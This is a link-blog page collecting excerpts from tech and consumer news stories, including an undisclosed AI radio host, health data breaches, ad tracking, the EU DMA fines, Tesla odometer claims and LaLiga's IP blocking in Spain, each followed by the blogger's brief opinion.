The story goes that their workdays presenter – a woman called Thy – actually doesn’t exist. She’s a character made using AI, and rolled out onto CADA’s website.

[…]

What is Thy’s last name? Who is she? Where did she come from? There is no biography, or further information about the woman who is supposedly presenting this show.

Compare that to the (recently resigned) breakfast presenter Sophie Nathan or the drive host K-Sera. Both their show pages include multi-paragraph biographies which include details about their careers and various accolades. They both have a couple of different photos taken during various press shoots.

But perhaps the strangest thing about Thy is that she appears to be a young woman in her 20s who has absolutely no social media presence. This is particularly unusual for someone who works in the media, where the size of your audience is proportionate to your bargaining power in the industry.

There are no photos or videos of Thy on CADA’s socials, either. It seems she was photographed just once and then promptly turned invisible.

[…]

I decided to listen back to previous shows, using the radio archiving tool Flashback. Thy hasn’t been on air for the last fortnight. Before then, the closest thing to a radio host can be found just before the top of the hour. A rather mechanical-sounding female voice announces what songs are coming up. This person does not give her name, and none of the sweepers announce her or the show.

I noticed that on two different days, Thy announced ‘old school’ songs. On the 25th it was “old school Beyonce”, and then on the 26th it was “old school David Guetta”. Across two different days, the intonation was, I thought, strikingly similar.

To illustrate the point, I isolated the voice, and layered them on to audio tracks. There is a bit of interference from the imperfectly-removed song playing underneath the voice, but the host sounds identical in both instances.

Despite all this evidence, there’s still is a slim chance that Thy is a person. She might be someone who doesn’t like social media and is a bit shy around the office. Or perhaps she’s a composite of a couple of real people: someone who recorded her voice to be synthesised, another who’s licensing her image.

[…]

Source: Meet Thy – the radio host I don’t think exists

[…] An ARN spokesperson said the company was exploring how new technology could enhance the listener experience.

“We’ve been trialling AI audio tools on CADA, using the voice of Thy, an ARN team member. This is a space being explored by broadcasters globally, and the trial has offered valuable insights.”

However, it has also “reinforced the power of real personalities in driving compelling content”, the spokesperson added.

The Australian Financial Review reported that Workdays with Thy has been broadcast on CADA since November, and was reported to have reached at least 72,000 people in last month’s ratings.

[….]

CADA isn’t the first radio station to use an AI-generated host. Two years ago, Australian digital radio company Disrupt Radio introduced its own AI newsreader, Debbie Disrupt.

Source: AI host: ARN radio station CADA called out for failing to disclose AI host

Now both of these articles go off the rails about using AI and saying that the radio station should have disclosed that they were using an AI. There is absolutely no legal obligation to disclose this and I think it’s pretty cool that AI is progressing to the point that this can be done. So now if you want to be a broadcaster yourself you can enforce your station vision 24/7 – which you could never possibly do on your own.

ElevenLabs — a generative AI audio platform that transforms text into speech

And write, apparently. Someone needed to produce the “script” that the AI host used, which may also have had some AI involvement I suppose, but ultimately this seems to be just a glorified text to speech engine trying to cash in on the AI bubble. Or maybe they took it to the next logical step and just feed it a playlist and it generates the necessary “filler” from that and what it can find online from a search of the artist and title, plus some randoms chit chat from a (possibly) curated list of relevant current affairs articles.

Frankly, if people couldn’t tell for six months, then whatever they are doing is clearly good enough and the smarter radio DJs are probably already thinking about looking for other work or adding more interactive content like interviews into their shows. Talk Show type presenters probably have a little longer, but it’s probably just a matter of time for them too.

Source: https://radio.slashdot.org/comments.pl?sid=23674797&cid=65329681

A Data Breach at Yale New Haven Health Compromised 5.5 Million Patients’ Information

[…]Yale New Haven Health (YNHHS), a massive nonprofit healthcare network in Connecticut. Hackers stole the data of more than 5.5 million individuals during an attack in March 2025.

[…]

According to a public notice on the YNHHS website, the organization discovered “unusual activity” on its system on March 8, 2025, which was later identified as unauthorized third-party access that allowed bad actors to copy certain patient data. While the information stolen varies by individual, it may include the following:

  • Name
  • Date of birth
  • Address
  • Phone number
  • Email address
  • Race
  • Ethnicity
  • Social Security number
  • Patient type
  • Medical record number

YNHHS says the breach did not include access to medical records, treatment information, or financial data (such as account and payment information).

[…]

Source: A Data Breach at Yale New Haven Health Compromised 5.5 Million Patients’ Information | Lifehacker

Wait – race and ethnicity?!

Perplexity CEO says its browser will track everything users do online to sell ‘hyper personalized’ ads

CEO Aravind Srinivas said this week on the TBPN podcast that one reason Perplexity is building its own browser is to collect data on everything users do outside of its own app. This so it can sell premium ads.

“That’s kind of one of the other reasons we wanted to build a browser, is we want to get data even outside the app to better understand you,” Srinivas said. “Because some of the prompts that people do in these AIs is purely work-related. It’s not like that’s personal.”

And work-related queries won’t help the AI company build an accurate-enough dossier.

“On the other hand, what are the things you’re buying; which hotels are you going [to]; which restaurants are you going to; what are you spending time browsing, tells us so much more about you,” he explained.

Srinivas believes that Perplexity’s browser users will be fine with such tracking because the ads should be more relevant to them.

“We plan to use all the context to build a better user profile and, maybe you know, through our discover feed we could show some ads there,” he said.

The browser, named Comet, suffered setbacks but is on track to be launched in May, Srinivas said.

He’s not wrong, of course. Quietly following users around the internet helped Google become the roughly $2 trillion market cap company it is today.

[…]

Meta’s ad tracking technology, Pixels, which is embedded on websites across the internet, is how Meta gathers data, even on people that don’t have Facebook or Instagram accounts. Even Apple, which has marketed itself as a privacy protector, can’t resist tracking users’ locations to sell advertising in some of its apps by default.

On the other hand, this kind of thing has led people across the political spectrum in the U.S. and in Europe to distrust big tech.

The irony of Srinivas openly explaining his browser-tracking ad-selling ambitions this week also can’t be overstated.

Google is currently in court fighting the U.S. Department of Justice, which has alleged Google behaved in monopolistic ways to dominate search and online advertising. The DOJ wants the judge to order Google to divest Chrome.

Both OpenAI and Perplexity — not surprisingly, given Srinivas’ reasons — said they would buy the Chrome browser business if Google was forced to sell.

Source: Perplexity CEO says its browser will track everything users do online to sell ‘hyper personalized’ ads | TechCrunch

Yup, so even if Mozilla is making Firefox more invasive, it’s still better than these guys.

Study finding persistent chemical in European wines raises doubts and concerns

A report by the Pesticides Action Network (PAN Europe) and other NGOs that uncovered high concentrations of a forever chemical in wines from across the EU – including organic – is sparking debate about the causes of contamination and restrictions on the substance. 

The report found some wines had trifluoroacetic acid (TFA) levels 100 times higher than the strictest threshold for drinking water in Europe.

TFA is part of the PFAS (per- and polyfluoroalkyl) family of substances used in many products, including pesticides, for their water-repellent properties. Extremely persistent in the environment, they are a known threat to human health.

“This is a wake-up call,” said Helmut Burtscher-Schaden, an environmental chemist at Global 2000, one of the NGOs behind the research. “TFA is a permanent chemical and will not go away.” 

The NGOs analysed 49 wines. Comparing modern wines with older vintages, the findings suggested no detectable residues in pre-1988 wines but a sharp increase since 2010.  

“For no other agricultural product are the harvests from past decades so readily available and well-preserved,” the study said.

PAN sees a correlation between rising levels of TFA in wine and the growing use PFAS-based pesticides.

Under the spotlight

Though nearly a quarter of Austria’s vineyards are cultivated with the organic method, Austrian bottles are over-represented in the list of contaminated wines, 18 out of 49, as the NGOs started testing from the country before expanding the reach of the research.

[… Winemakers complain about the study, who would have thought…]

In response, the European executive’s officials passed the buck to member states, noting they resisted the Commission’s proposal to quit renewing certain PFAS pesticides. An eventual agreement was reached on just two substances.

More could be done to limit PFAS chemicals at the national level under the current EU legislation, Commission representatives said.

Source: Study finding persistent chemical in European wines raises doubts and concerns – Euractiv

Spacetop AR is now an expensive Windows app instead of a useless screenless laptop

The Spacetop AR laptop made a splash when it debuted a few years ago with an intriguing pitch: What if you could have a notebook that works entirely through augmented reality glasses, without a built-in screen of its own? Unfortunately, we found the Spacetop experience to be underwhelming, and the hardware seemed like a tough sell for $1,900. Last Fall, Spacetop’s creator Sightful told CNET that it was abandoning the screen-less laptop altogether and instead focusing on building AR software for Windows PCs. Now, we have a clearer sense of what Sightful is up to.

Today, Sightful is officially launching Spacetop for Intel-powered Windows AI PCs, following a short trial launch from January. For $899 you get a pair of XREAL’s Air Ultra 2 glasses and a year of Spacetop’s software. Afterwards, you’ll have to pay $200 annually for a subscription. The software works just like the original Spacetop concept — it gives you a large 100-inch AR interface for doing all of your productivity work — except now you’re not stuck with the company’s middling keyboard and other hardware.

[…]

Spacetop doesn’t support Intel chips without NPUs, as its AR interface requires constant AI processing. It doesn’t work AMD or Qualcomm’s AI CPUs, either.

[…]

In a conversation with Engadget, Sightful CEO Tamir Berliner noted that the company might pay more attention to other chip platforms if it gets similar attention.

[…]

you’ll have to get used to wearing Xreal’s large Air 2 Ultra glasses. When we demoed it at CES, we found it to be an improvement over previous Xreal frames, thanks to their sharp 1080p micro-OLED displays and wider field of view. The Air 2 Ultra are also notable for having 6DoF tracking, which allows you to move around AR objects. While sleeker than the Vision Pro, the glasses are still pretty clunky, and you’ll also have to snap in additional prescription frames if necessary.

I’ll need to see this latest iteration of Spacetop in action before making any final judgments, but it’s clearly a more viable concept as an app that can work on a variety of laptops. Nobody wants to buy bespoke hardware like the old Spacetop laptop, no matter how good of a party trick it may be.

Source: Spacetop AR is now an expensive Windows app instead of a useless screenless laptop

This looks like an excellent idea and one which I would love to get if it wasn’t tied so much to hardware and $200 per year.

EC fines Meta, Apple €700M for DMA compliance failures

Meta and Apple have earned the dubious honor of being the first companies fined for non-compliance with the EU’s Digital Markets Act, which experts say could inflame tensions between US President Donald Trump and the European bloc.

Apple was penalised to the tune of €500 million ($570 million) for violating anti-steering rules and Meta by €200 million ($228 million) for its “consent or pay” ad model, the EU said in a press release.

The fines are a pittance for both firms, whose most recent quarterly earnings statements from January saw Apple report $36.33 billion in net income, and Meta $20.83 billion.

Apple’s penalty related to anti-steering violations – for which it’s already paid a €1.8 billion penalty to the EU – saw it found guilty of not allowing app developers to direct users outside Apple’s own in-app payment system for cheaper alternatives. The European Commission also ordered Apple to “remove the technical and commercial restrictions on steering” while simultaneously closing an investigation into Apple’s user choice obligations, finding that “early and proactive” moves by Cupertino to address compliance shortcomings resolved the issue.

Meta, on the other hand, was fined for the pay-or-consent model whereby it offered a paid, ad-free version of its services as the only alternative to allowing the company to harvest user data. The strategy earned it considerable ire in Europe for exactly the reason the EU began investigating it last year: That it still ingested data even if users paid and that it wasn’t clear about how personal data was being collected or used.

“The Commission found that this model is not compliant with the DMA,” the EC said, because it gave users no choice to opt into a service that used less of their data, nor did it allow users to freely consent to having their data combined.

That fine only applies to the period between March and November 2024 when the consent-or-pay model was active, however. The EU said that a new advertising model introduced in November of last year resolved many of its concerns, which European Privacy advocate Max Schrems says will likely still be an issue.

“Meta has moved to a system with a ‘pay,’ a ‘consent’ and a ‘less ads’ option,” Schrems explained in a statement emailed to The Register. Schrems said the “less ads” option is nothing but a distraction.

“It has massive usability limitations – nothing any user seriously wants,” Schrems said. “Meta has simply created a ‘fake choice’, pretending that it would overcome the illegal ‘pay or okay’ approach.”

Alongside the fines, the EU also said that it was removing Facebook Marketplace’s designation as a DMA gatekeeper, as it had too few commercial users to qualify as “an important gateway for business users to reach end users.”

[… followed by stuff about how Americans don’t like the fines in usual snowflakey Trump style crying tantrums]

Source: EC fines Meta, Apple €700M for DMA compliance failures • The Register

Blue Shield of California Exposed the Data of 4.7 Million People to Google for targeted advertising

Blue Shield of California shared the protected health information of 4.7 million individuals with Google over a nearly three-year period, a data breach that impacts the majority of its nearly 6 million members, according to reporting from Bleeping Computer.

This isn’t the only large data breach to affect a healthcare organization the last year alone. Community Health Center records were hacked in October 2024, compromising more than a million individuals’ data, along with an attack on lab testing company Lab Services Cooperative, which affected records of 1.6 million Planned Parenthood patients. UnitedHealth Group suffered a breach in February 2024, resulting in the leak of more than 100 million people’s data.

What happened with Blue Shield of California?

According to an April 9 notice posted on Blue Shield of California’s website, the company allowed certain data, including protected health information, to be shared with Google Ads through Google Analytics, which may have allowed Google to serve targeted ads back to members. While not discovered until Feb. 11, 2025, the leak occurred for several years, from April 2021 to January 2024, when the connection between Google Analytics and Google Ads was severed on Blue Shield websites.

The following Blue Shield member information may have been compromised:

  • Insurance plan name, type, and group number
  • City and zip code
  • Gender
  • Family size
  • Blue Shield assigned identifiers for online accounts
  • Medical claim service date and provider
  • Patient name
  • Patient financial responsibility
  • “Find a Doctor” search criteria and results

According to the notice, no additional personal data—Social Security numbers, driver’s license numbers, and banking and credit card information—were disclosed. Blue Shield also states that no bad actor was involved, nor have they confirmed that the information has been used maliciously.

[…]

Source: Blue Shield of California Exposed the Data of 4.7 Million People to Google | Lifehacker

Tesla now seems to be remote hacking odometers to weasel out of warranty repairs. Time to stop DMCA type laws globally.

A lawsuit filed in February accuses Tesla of remotely altering odometer values on failure-prone cars, in a bid to push these lemons beyond the 50,000 mile warranty limit:

https://www.thestreet.com/automotive/tesla-accused-of-using-sneaky-tactic-to-dodge-car-repairs

The suit was filed by a California driver who bought a used Tesla with 36,772 miles on it. The car’s suspension kept failing, necessitating multiple servicings, and that was when the plaintiff noticed that the odometer readings for his identical daily drive were going up by ever-larger increments. This wasn’t exactly subtle: he was driving 20 miles per day, but the odometer was clocking 72.35 miles/day. Still, how many of us monitor our daily odometer readings?

In short order, his car’s odometer had rolled over the 50k mark and Tesla informed him that they would no longer perform warranty service on his lemon. Right after this happened, the new mileage clocked by his odometer returned to normal. This isn’t the only Tesla owner who’s noticed this behavior: Tesla subreddits are full of similar complaints:

https://www.reddit.com/r/RealTesla/comments/1ca92nk/is_tesla_inflating_odometer_to_show_more_range/

This isn’t Tesla’s first dieselgate scandal. In the summer of 2023, the company was caught lying to drivers about its cars’ range:

https://pluralistic.net/2023/07/28/edison-not-tesla/#demon-haunted-world

Drivers noticed that they were getting far fewer miles out of their batteries than Tesla had advertised. Naturally, they contacted the company for service on their faulty cars. Tesla then set up an entire fake service operation in Nevada that these calls would be diverted to, called the “diversion team.” Drivers with range complaints were put through to the “diverters” who would claim to run “remote diagnostics” on their cars and then assure them the cars were fine. They even installed a special xylophone in the diversion team office that diverters would ring every time they successfully deceived a driver.

These customers were then put in an invisible Tesla service jail. Their Tesla apps were silently altered so that they could no longer book service for their cars for any reason – instead, they’d have to leave a message and wait several days for a callback. The diversion center racked up 2,000 calls/week and diverters were under strict instructions to keep calls under five minutes. Eventually, these diverters were told that they should stop actually performing remote diagnostics on the cars of callers – instead, they’d just pretend to have run the diagnostics and claim no problems were found (so if your car had a potentially dangerous fault, they would falsely claim that it was safe to drive).

Most modern cars have some kind of internet connection, but Tesla goes much further. By design, its cars receive “over-the-air” updates, including updates that are adverse to drivers’ interests. For example, if you stop paying the monthly subscription fee that entitles you to use your battery’s whole charge, Tesla will send a wireless internet command to your car to restrict your driving to only half of your battery’s charge.

This means that your Tesla is designed to follow instructions that you don’t want it to follow, and, by design, those instructions can fundamentally alter your car’s operating characteristics. For example, if you miss a payment on your Tesla, it can lock its doors and immobilize itself, then, when the repo man arrives, it will honk its horn, flash its lights, back out of its parking spot, and unlock itself so that it can be driven away:

https://tiremeetsroad.com/2021/03/18/tesla-allegedly-remotely-unlocks-model-3-owners-car-uses-smart-summon-to-help-repo-agent/

Some of the ways that your Tesla can be wirelessly downgraded (like disabling your battery) are disclosed at the time of purchase. Others (like locking you out and summoning a repo man) are secret. But whether disclosed or secret, both kinds of downgrade depend on the genuinely bizarre idea that a computer that you own, that is in your possession, can be relied upon to follow orders from the internet even when you don’t want it to. This is weird enough when we’re talking about a set-top box that won’t let you record a TV show – but when we’re talking about a computer that you put your body into and race down the road at 80mph inside of, it’s frankly terrifying.

[…]

Laws that ban reverse-engineering are a devastating weapon that corporations get to use in their bid to subjugate and devour the human race.

The US isn’t the only country with a law like Section 1201 of the DMCA. Over the past 25 years, the US Trade Representative has arm-twisted nearly every country in the world into passing laws that are nearly identical to America’s own disastrous DMCA. Why did countries agree to pass these laws? Well, because they had to, or the US would impose tariffs on them:

https://pluralistic.net/2025/03/03/friedmanite/#oil-crisis-two-point-oh

The Trump tariffs change everything, including this thing. There is no reason for America’s (former) trading partners to continue to enforce the laws it passed to protect Big Tech’s right to twiddle their citizens. That goes double for Tesla: rather than merely complaining about Musk’s Nazi salutes, countries targeted by the regime he serves could retaliate against him, in a devastating fashion. By abolishing their anticircuvmention laws, countries around the world would legalize jailbreaking Teslas, allowing mechanics to unlock all the subscription features and software upgrades for every Tesla driver, as well as offering their own software mods. Not only would this tank Tesla stock and force Musk to pay back the loans he collateralized with his shares (loans he used to buy Twitter and the US predidency), it would also abolish sleazy gimmicks like hacking drivers’ odometers to get out of paying for warranty service:

https://pluralistic.net/2025/03/08/turnabout/#is-fair-play

Source: Pluralistic: Tesla accused of hacking odometers to weasel out of warranty repairs (15 Apr 2025) – Pluralistic: Daily links from Cory Doctorow

Discord Wants Your Face: Begins Testing Facial Scans for Age Verification

Discord has begun requiring some users in the United Kingdom and Australia to verify their age through a facial scan before being permitted to access sensitive content. The chat app’s new process has been described as an “experiment,” and comes in response to laws passed in those countries that place guardrails on youth access to online platforms. Discord has also been the target of concerns that it does not sufficiently protect minors from sexual content.

Users may be asked to verify their age when encountering content that has been flagged by Discord’s systems as being sensitive in nature, or when they change their settings to enable access to sensitive content. The app will ask users to scan their face through a computer or smartphone webcam; alternatively, they can scan a driver’s license or other form of ID.

[…]

Source: Discord Begins Testing Facial Scans for Age Verification

Age verification is impossible to do correctly, incredibly privacy invasive and a really hacker tempting target. The UK and Australia and every other country considering age verification are seriously endangering their citizens.

Fortunately you can always hold up a picture from a magazine in front of the webcam.

Your TV is watching you better: LG TVs’ integrated ads get more personal with tech that analyzes viewer emotions

LG TVs will soon leverage an AI model built for showing advertisements that more closely align with viewers’ personal beliefs and emotions. The company plans to incorporate a partner company’s AI tech into its TV software in order to interpret psychological factors impacting a viewer, such as personal interests, personality traits, and lifestyle choices. The aim is to show LG webOS users ads that will emotionally impact them.

The upcoming advertising approach comes via a multi-year licensing deal with Zenapse, a company describing itself as a software-as-a-service marketing platform that can drive advertiser sales “with AI-powered emotional intelligence.” LG will use Zenapse’s technology to divide webOS users into hyper-specific market segments that are supposed to be more informative to advertisers. LG Ad Solutions, LG’s advertising business, announced the partnership on Tuesday.

The technology will be used to inform ads shown on LG smart TVs’ homescreens, free ad-supported TV (FAST) channels, and elsewhere throughout webOS, per StreamTV Insider. LG will also use Zenapse’s tech to “expand new software development and go-to-market products,” it said. LG didn’t specify the duration of its licensing deal with Zenapse.

[…]

With all this information, ZenVision will group LG TV viewers into highly specified market segments, such as “goal-driven achievers,” “social connectors,” or “emotionally engaged planners,” an LG spokesperson told StreamTV Insider. Zenapse’s website for ZenVision points to other potential market segments, including “digital adopters,” “wellness seekers,” “positive impact & environment,” and “money matters.”

Companies paying to advertise on LG TVs can then target viewers based on the ZenVision-specified market segments and deliver an “emotionally intelligent ad,” as Zenapse’s website puts it.

This type of targeted advertising aims to bring advertisers more in-depth information about TV viewers than demographic data or even contextual advertising (which shows ads based on what the viewer is watching) via psychographic data. Demographic data gives advertisers viewer information, like location, age, gender, ethnicity, marital status, and income. Psychographic data is supposed to go deeper and allow advertisers to target people based on so-called psychological factors, like personal beliefs, values, and attitudes. As Salesforce explains, “psychographic segmentation delves deeper into their psyche” than relying on demographic data.

[…]

With their ability to track TV viewers’ behavior, including what they watch and search for on their TVs, smart TVs are a growing obsession for advertisers. As LG’s announcement pointed out, CTVs represent “one of the fastest-growing ad segments in the US, expected to reach over $40 billion by 2027, up from $24.6 billion in 2023.”

However, as advertisers’ interest in appealing to streamers grows, so do their efforts to track and understand viewers for more targeted advertising. Both efforts could end up pushing the limits of user comfort and privacy.

[…]

 

Source: LG TVs’ integrated ads get more personal with tech that analyzes viewer emotions – Ars Technica

An LG TV is not exactly a cheap thing. I am paying for the whole product, not for a service. I bought a TV, not a marketing department.

Google Found Guilty of Illegal Ad Tech Monopoly in US Federal Court Ruling

A federal judge has ruled that Google maintained illegal monopolies in the digital advertising technology market.

In a landmark case, the Department of Justice and 17 states found Google liable for antitrust violations.

Federal Court Finds Google Violated Sherman Act

U.S. District Judge Leonie Brinkema ruled that Google illegally monopolized two key markets in digital advertising:

  • The publisher ad server market
  • The ad exchange market

The 115-page ruling (PDF link) states Google violated Section 2 of the Sherman Antitrust Act by “willfully acquiring and maintaining monopoly power.”

It also found that Google unlawfully tied its publisher ad server (DFP) and ad exchange (AdX) together.

Judge Brinkema wrote in the ruling:

“Plaintiffs have proven that Google possesses monopoly power in the publisher ad server for open-web display advertising market. Google’s publisher ad server DFP has a durable and ‘predominant share of the market’ that is protected by high barriers both to entry and expansion.”

Google’s Dominant Market Position

The court found that Google controlled approximately 91% of the worldwide publisher ad server market for open-web display advertising from 2018 to 2022.

In the ad exchange market, Google’s AdX handled between 54% and 65% of total transactions, roughly nine times larger than its closest competitor.

The judge cited Google’s pricing power as evidence of its monopoly. Google maintained a 20% take rate for its ad exchange services for over a decade, despite competitors charging only 10%.

The ruling states:

“Google’s ability to maintain AdX’s 20% take rate under these market conditions is further direct evidence of the firm’s sustained and substantial power.”

Illegal Tying of Services Found

A key part of the ruling focused on Google’s practice of tying its publisher ad server (DFP) to its ad exchange (AdX).

The court determined that Google effectively forced publishers to use DFP if they wanted access to real-time bidding with AdWords advertisers, a crucial feature of AdX.

Judge Brinkema wrote, quoting internal Google communications:

“By tying DFP to AdX, Google took advantage of its ‘owning the platform, the exchange, and a huge network’ of advertising demand.”

This was compared to “Goldman or Citibank own[ing] the NYSE [i.e., the New York Stock Exchange].”

[…]

What’s Next?

Judge Brinkema has yet to decide on penalties for Google’s violations. Soon, the court will “set a briefing schedule and hearing date to determine the appropriate remedies.”

Possible penalties include forcing Google to sell parts of its ad tech business. This would dramatically change the digital advertising landscape.

This ruling signals that changes may be coming for marketers relying on Google’s integrated advertising system.

Google intends to appeal the decision, extending the legal battle for years.

[…]

Source: Google Found Guilty of Illegal Ad Tech Monopoly in Court Ruling

OpenDNS Quits Belgium Under Threat of Piracy Blocks or Fines of €100K Per Day after having quit France

In a brief statement citing a court order in Belgium but providing no other details, Cisco says that its OpenDNS service is no longer available to users in Belgium. Cisco’s withdrawal is almost certainly linked to an IPTV piracy blocking order obtained by DAZN; itt requires OpenDNS, Cloudflare and Google to block over 100 pirate sites or face fines of €100,000 euros per day. Just recently, Cisco withdrew from France over a similar order.

dns-block-soccer-ball1 Without assurances that hosts, domain registries, registrars, DNS providers, and consumer ISPs would not be immediately held liable for internet users’ activities, investing in the growth of the early internet may have proven less attractive.

Of course, not being held immediately liable is a far cry from not being held liable at all. After years of relatively plain sailing, multiple ISPs in the United States are currently embroiled in multi-multi million dollar lawsuits for not policing infringing users. In Europe, countries including Italy and France have introduced legislation to ensure that if online services facilitate or assist piracy in any way, they can be compelled by law to help tackle it.

DNS Under Pressure

Given their critical role online, and the fact that not a single byte of infringing content has ever touched their services, some believed that DNS providers would be among the last services to be put under pressure.

After Sony sued Quad9 and wider discussions opened up soon after, in 2023 Canal+ used French law to target DNS providers. Last year, Google, Cloudflare, and Cisco were ordered to prevent their services from translating domain names into IP addresses used by dozens of sports piracy sites.

While all three companies objected, it’s understood that Cloudflare and Google eventually complied with the order. Cisco’s compliance was also achieved, albeit by its unexpected decision to suspend access to its DNS service for the whole of France and the overseas territories listed in the order.

So Long France, Goodbye Belgium

Another court order obtained by DAZN at the end of March followed a similar pattern.

dazn-block-s1 Handed down by a court in Belgium, it compels the same three DNS providers to cease returning IP addresses when internet users provide the domain names of around 100 pirate sports streaming sites.

At last count those sites were linked to over 130 domain names which in its role as a search engine operator, Google was also ordered to deindex from search results.

During the evening of April 5, Belgian media reported that a major blocking campaign was underway to protect content licensed by DAZN and 12th Player, most likely football matches from Belgium’s Pro League. DAZN described the action as the “the first of its kind” and a “real step forward” in the fight against content piracy. Google and Cloudflare’s participation was not confirmed, but it seems likely that Cisco was not involved all.

In a very short statement posted to the Cisco community forum, employee tom1 announced that effective April 11, 2025, OpenDNS will no longer be accessible to users in Belgium due to a court order. The nature of the order isn’t clarified, but it almost certainly refers to the order obtained by DAZN.

 

cisco-belgium
 

Cisco’s suspension of OpenDNS in Belgium mirrors its response to a similar court order in France. Both statements were delivered without fanfare which may suggest that the company prefers not to be seen as taking a stand. In reality, Cisco’s reasons are currently unknown and that has provoked some interesting comments from users on the Cisco community forum.

[…]

Source: OpenDNS Quits Belgium Under Threat of Piracy Blocks or Fines of €100K Per Day * TorrentFreak

Yup the copyrights holders are again blocking human progress on a massive scale and corrupt politicians are creating rules that allow them to pillage whilst holding us back.

Toothpaste widely contaminated with lead and other metals, US research finds

Toothpaste can be widely contaminated with lead and other dangerous heavy metals, new research shows.

Most of 51 brands of toothpaste tested for lead contained the dangerous heavy metal, including those for children or those marketed as green. The testing, conducted by Lead Safe Mama, also found concerning levels of highly toxic arsenic, mercury and cadmium in many brands.

About 90% of toothpastes contained lead, 65% contained arsenic, just under half contained mercury, and one-third had cadmium. Many brands contain a number of the toxins.

The highest levels detected violated the state of Washington’s limits, but not federal limits. The thresholds have been roundly criticized by public health advocates for not being protective – no level of exposure to lead is safe, the federal government has found.

“It’s unconscionable – especially in 2025,” said Tamara Rubin, Lead Safe Mama’s founder. “What’s really interesting to me is that no one thought this was a concern.”

Lead can cause cognitive damage to children, harm the kidneys and cause heart disease, among other issues. Lead, mercury, cadmium and arsenic are all carcinogens.

Rubin first learned that lead-contaminated ingredients were added to toothpaste about 12 years ago while working with families that had children with high levels of the metal in their blood. The common denominator among them was a brand of toothpaste, Earthpaste, that contained lead.

Last year she detected high levels in some toothpaste using an XRF lead detection tool. The levels were high enough to raise concern, and she crowdfunded with readers to send popular brands to an independent laboratory for testing.

Among those found to contain the toxins were Crest, Sensodyne, Tom’s of Maine, Dr Bronner’s, Davids, Dr Jen and others.

So far, none of the companies Lead Safe Mama checked have said they will work to get lead out of their product, Rubin said. Several sent her cease-and-desist letters, which she said she ignored, but also posted on her blog.

[…]

Source: Toothpaste widely contaminated with lead and other metals, US research finds | US news | The Guardian

Spotify was down for a while. Yay clouds.

April 16

The music-streaming app Spotify was down for a good chunk of time this morning, leaving millions of music fans in the lurch. Both the app and web client weren’t working, but service seem to be broadly returned to normal at this point, though lingering bugs may remain.

To view this content, you’ll need to update your privacy settings. Please click here and view the “Content and social-media partners” setting to do so.

At about 10:40AM ET, Spotify updated its X account saying it was working on the issue and also said that “the reports of this being a security hack are false.” We haven’t seen any such reports yet, but we’ll keep an eye on things to see if they offer any more details on this front. Finally, at 12:08PM ET, the company said things were back to normal. All told, it seems like things were down for nearly four hours, a pretty long outage.

Update, April 16, 2025, 11:04AM ET: Added details about Spotify claiming this downtime was not due to a security hack.

Update, April 16 2025, 12:18PM ET: This story and its headline have been updated to note that Spotify is now back online after its outage.

Source: Spotify was down for a while this morning, but it’s back now

This is one reason why I like my mp3s.

LaLiga Piracy Blocks Randomly Take Down huge innocent segments of internet with no recourse or warning, slammed as “Unaccountable Internet Censorship”

Cloud-based web application platform Vercel is among the latest companies to find their servers blocked in Spain due to LaLiga’s ongoing IPTV anti-piracy campaign. In a statement, Vercel’s CEO and the company’s principal engineer slam “indiscriminate” blocking as an “unaccountable form of internet censorship” that has prevented legitimate customers from conducting their daily business.

laliga-vercel1 Since early February, Spain has faced unprecedented yet avoidable nationwide disruption to previously functioning, entirely legitimate online services.

A court order obtained by top-tier football league LaLiga in partnership with telecommunications giant Telefonica, authorized ISP-level blocking across all major ISPs to prevent public access to pirate IPTV services and websites.

In the first instance, controversy centered on Cloudflare, where shared IP addresses were blocked by local ISPs when pirates were detected using them, regardless of the legitimate Cloudflare customers using them too.

When legal action by Cloudflare failed, in part due to a judge’s insistence that no evidence of damage to third parties had been proven before the court, joint applicants LaLiga and Telefonica continued with their blocking campaign. It began affecting innocent third parties early February and hasn’t stopped since.

Vercel Latest Target

US-based Vercel describes itself as a “complete platform for the web.” Through the provision of cloud infrastructure and developer tools, users can deploy code from their computers and have it up and running in just seconds. Vercel is not a ‘rogue’ hosting provider that ignores copyright complaints, it takes its responsibilities very seriously.

Yet it became evident last week that blocking instructions executed by Telefonica-owned telecoms company Movistar were once again blocking innocent users, this time customers of Vercel.

 

Movistar informed of yet more adverse blockingblock-laliga-tinybird
 

As the thread on X continued, Vercel CEO Guillermo Rauch was asked whether Vercel had “received any requests to remove illegal content before the blocking occurs?”

Vercel Principal Engineer Matheus Fernandes answered quickly.

 

No takedown requests, just blocksblock-laliga-vercel
 

Additional users were soon airing their grievances; ChatGPT blocked regularly on Sundays, a whole day “ruined” due to unwarranted blocking of AI code editor Cursor, blocking at Cloudflare, GitHub, BunnyCDN, the list goes on.

 

shame
 

Vercel Slams “Unaccountable Internet Censorship”

In a joint statement last week, Vercel CEO Guillermo Rauch and Principal Engineer Matheus Fernandes cited the LaLiga/Telefonica court order and reported that ISPs are “blocking entire IP ranges, not specific domains or content.”

Among them, the IP addresses 66.33.60.129 and 76.76.21.142, “used by businesses like Spanish startup Tinybird, Hello Magazine, and others operating on Vercel, despite no affiliations with piracy in any form.”

[…]

The details concerning this latest blocking disaster and the many others since February, are unavailable to the public. This lack of transparency is consistent with most if not all dynamic blocking programs around the world. With close to zero transparency, there is no accountability when blocking takes a turn for the worse, and no obvious process through which innocent parties can be fairly heard.

[…]

The hayahora.futbol project is especially impressive; it gathers evidence of blocking events, including dates, which ISPs implemented blocking, how long the blocks remained in place, and which legitimate services were wrongfully blocked.

[…]

Source: Vercel Slams LaLiga Piracy Blocks as “Unaccountable Internet Censorship” * TorrentFreak

So guys streaming a *game* can close down huge sections of internet without accountability? How did a law like that happen without some serious corruption?